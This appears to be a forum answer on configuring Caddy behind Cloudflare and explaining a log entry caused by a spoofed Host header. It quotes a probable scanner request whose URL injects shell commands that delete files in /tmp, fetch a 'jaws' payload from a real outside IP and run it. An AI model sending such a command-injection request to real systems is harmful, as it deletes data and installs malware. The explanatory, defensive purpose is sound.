You probably need to add this:
client_ip_headers CF-Connecting-IP
Inside your config, it should look something like this:
servers {
trusted_proxies cloudflare {
interval 12h
timeout 15s
}
client_ip_headers CF-Connecting-IP
}
There are two things going on in that log:
- Caddy redirects HTTP to HTTPS by default.
- Someone is spoofing the
Hostheader. A normal browser wouldn’t add:80to theHostheader for HTTP (just like it wouldn’t add:443for HTTPS).
So what’s likely happening is someone is sending a request like this, with a fake Host header:
curl 'http://IP_ADDRESS_OF_THE_SERVER/shell?cd+/tmp;rm+-rf+*;wget+45.90.12.71/jaws;sh+/tmp/jaws' -H 'Host: 127.0.0.1:80'
Caddy receives that and issues an HTTP 308 redirect to:
Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+45.90.12.71/jaws;sh+/tmp/jaws
That’s the only case I can think of where Caddy would log HTTP traffic with this:
"host": "127.0.0.1:80",
including the port number :80 in the host field.